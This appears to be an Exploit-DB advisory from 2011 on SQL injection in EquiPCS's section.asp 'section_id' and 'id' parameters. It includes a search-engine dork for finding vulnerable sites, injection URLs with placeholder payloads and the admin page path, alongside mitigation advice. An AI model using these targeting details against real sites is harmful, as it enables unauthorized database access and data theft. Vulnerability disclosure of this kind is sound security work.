EquiPCS=>SQL onjection vulnerability

vendor:

N/A

by:

Sideswipe

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP and Windows 7

2011

EquiPCS=>SQL onjection vulnerability

The vulnerability exists in the 'section.asp' and 'id' parameters of the website, which can be exploited to inject malicious SQL queries. An attacker can inject malicious SQL queries to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.

Source

Exploit-DB raw data:

============================================================
# Title: EquiPCS=>SQL onjection vulnerability
# Date:9/6/11
# Author: Sideswipe
# Home: www.pro2leet.net or www.alboraaq.com or www.indishell.in
# Category: Web apps
# Dork: intext:"Powered by EquiPCS "
# Tested On : Xp and windows 7
===========================================================

[-] Exploit:~
	
      #http://www.[localhost].com/section.asp?section_id=17'
      #http://www.[localhost].com/section.asp?section_id=(sql)

     #http://www.[localhost].com/section.asp?id=6'
     #http://www.[localhost].com/section.asp?id=(sql)


[-] Admin Page:~
  #http://www.[localhost].com/admin/

(^_^)GOOD LUCK ALL(^_^)
====================++Greetz to++===========================
T3es,underscore,loyal_boy,!-Bb0yH4cK3r_Dz-!,hackcore,saxxor
,j|nx,Foxmind,Cyberseller,Anthrax,shani,anthrax,Ratchet,starlash,
ssgodfather,xConsole,balazee,Hexcoder,balazee,krishandpatill
                                And all my friends
===========================================================